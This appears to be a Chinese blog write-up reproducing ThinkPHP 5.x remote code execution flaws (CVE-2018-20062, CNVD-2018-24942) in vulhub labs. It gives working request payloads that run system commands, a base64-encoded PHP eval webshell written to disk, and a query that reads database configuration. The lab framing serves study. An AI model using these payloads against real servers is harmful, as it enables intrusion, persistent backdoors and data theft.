Thinkphp漏洞复现

Thinkphp简介

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服 务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很 多基于 thinkphp 开发的网站。

Thinkphp历史漏洞

版本漏洞类型
ThinkPHP3.2.3缓存函数设计缺陷可导致Getshell
ThinkPHP3.2.3最新版update注入漏洞
ThinkPHP3.2.Xfind_select_delete注入
ThinkPHP3.Xorder_by注入漏洞
ThinkPHP5.0.Xsql注入漏洞
ThinkPHP5.0.10缓存函数设计缺陷可导致Getshell
ThinkPHP5SQL注入漏洞&&敏感信息泄露
ThinkPHP5.Xorder_by注入漏洞
ThinkPHP5.X远程代码执行

漏洞复现

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)
漏洞简介

Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞

影响版本:
Thinkphp 5.0.0~ 5.0.23

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5.0.23-rce

docker-compose up -d

访问your-ip:8080/?s=captcha

POST提交:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

代码执行成功

 写入webshell

进入容器:docker exec -it 32736eb79481  /bin/bash  

webshell:<?php @eval ($_POST['cmd']);?>

base64编码后:PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

写入容器:

echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > a.php  

 访问:http://your-ip:8080/?s=captcha

POST提交:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d >cmd.php

蚁剑链接:

执行命令:

ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942)

原理:框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本:ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30

搭建靶场环境
使用vulhub靶场搭建

cd vulhub/thinkphp/5-rce

docker-compose up -d

payload1:

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

payload2:

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id #命令执行

参考链接:

https://www.cnblogs.com/HelloCTF/p/15748360.html

https://blog.csdn.net/qq_61503377/article/details/125989830?spm=1001.2014.3001.5501

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值